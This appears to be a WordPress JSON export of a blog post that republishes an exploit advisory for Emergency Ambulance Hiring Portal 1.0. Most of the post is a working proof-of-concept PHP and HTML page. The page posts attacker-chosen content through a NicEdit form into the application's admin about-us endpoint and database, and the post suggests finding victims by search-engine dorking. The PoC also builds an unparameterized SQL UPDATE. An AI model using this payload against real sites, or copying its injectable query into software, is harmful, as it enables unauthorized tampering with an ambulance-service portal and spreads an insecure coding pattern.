{"id":59620,"date":"2024-09-11T20:00:06","date_gmt":"2024-09-11T17:00:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181442\/eahp10-inject.txt"},"modified":"2024-09-11T20:00:06","modified_gmt":"2024-09-11T17:00:06","slug":"emergency-ambulance-hiring-portal-1-0-wysiwyg-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/emergency-ambulance-hiring-portal-1-0-wysiwyg-code-injection\/","title":{"rendered":"Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection"},"content":{"rendered":"

=============================================================================================================================================
| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https:\/\/phpgurukul.com\/emergency-ambulance-hiring-portal-using-php-and-mysql\/ |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] Part 01 : about-us.php<\/p>\n[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file \/hms\/admin\/about-us.php . <\/p>\n[+] Line 2 : Make sure to include your database connection here<\/p>\n[+] Line 44 : Send the form data using fetch API (Set your target url)<\/p>\n[+] save payload as poc.php in your localhost path .<\/p>\n[+] payload : <\/p>\n

<?php
include(‘http:\/\/127.0.0.1\/eahp\/admin\/includes\/dbconnection.php’); \/\/ Make sure to include your database connection here<\/p>\n

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’ WHERE PageType=’aboutus'”);<\/p>\n

if ($query) {
echo ‘<script>alert(“About Us has been updated.”)<\/script>’;
} else {
echo ‘<script>alert(“Something Went Wrong. Please try again.”)<\/script>’;
}
exit;
}
?><\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>indoushka | Update About Us Content<\/title>
<!– NicEdit Script –>
<script src=”http:\/\/js.nicedit.com\/nicEdit-latest.js” type=”text\/javascript”><\/script>
<script type=”text\/javascript”>
\/\/ Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);<\/p>\n

\/\/ Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); \/\/ Prevent default form submission<\/p>\n

const pagetitle = document.getElementById(‘pagetitle’).value;
const pagedes = nicEditors.findEditor(‘pagedes’).getContent(); \/\/ Get the NicEdit content<\/p>\n

\/\/ Prepare the form data to be sent
const formData = new FormData();
formData.append(‘pagetitle’, pagetitle);
formData.append(‘pagedes’, pagedes);
formData.append(‘submit’, true);<\/p>\n

\/\/ Send the form data using fetch API
fetch(‘http:\/\/127.0.0.1\/eahp\/admin\/about-us.php’, {
method: ‘POST’,
body: formData,
})
.then(response => response.text())
.then(data => {
alert(‘About Us content has been updated successfully.’);
console.log(data); \/\/ Handle the response from the server
})
.catch(error => {
console.error(‘Error:’, error);
});
}
<\/script>
<style>
\/* Center the form container *\/
.editor-container {
max-width: 800px;
margin: 0 auto; \/* Center horizontally *\/
padding: 20px;
text-align: center; \/* Center the content inside *\/
}<\/p>\n

\/* Ensure the textarea takes the full width *\/
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
<\/style>
<\/head>
<body>
<div id=”app”>
<div class=”app-content”>
<div class=”main-content”>
<div class=”wrap-content container” id=”container”>
<!– Page Title Section –>
<section id=”page-title”>
<div class=”row”>
<div class=”col-sm-8″>
<h1 class=”mainTitle”>Update the About Us Content<\/h1>
<\/div><\/p>\n

<\/li>
<\/ol>
<\/div>
<\/section>
<!– Form Section –>
<div class=”container-fluid container-fullw bg-white”>
<div class=”row”>
<div class=”col-md-12″>
<!– Centering the form using a wrapper div –>
<div class=”editor-container”>
<form class=”forms-sample” method=”post” onsubmit=”submitForm(event);”>
<div class=”form-group”>
<label for=”pagetitle”>Page Title<\/label>
<input id=”pagetitle” name=”pagetitle” type=”text” class=”form-control” required>
<\/div>
<div class=”form-group”>
<label for=”pagedes”>Page Description<\/label>
<!– NicEdit will enhance this textarea –>
<textarea class=”form-control” name=”pagedes” id=”pagedes” rows=”12″><\/textarea>
<\/div>
<button type=”submit” class=”btn btn-primary mr-2″ name=”submit”>Submit<\/button>
<\/form>
<\/div>
<\/div>
<\/div>
<\/div>
<!– End Form Section –>
<\/div>
<\/div>
<\/div>
<\/div>
<!– Footer –>
<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/phpgurukul.com\/emergency-ambulance-hiring-portal-using-php-and-mysql\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] Part 01 : about-us.php …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59620","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59620"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59620\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59620"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}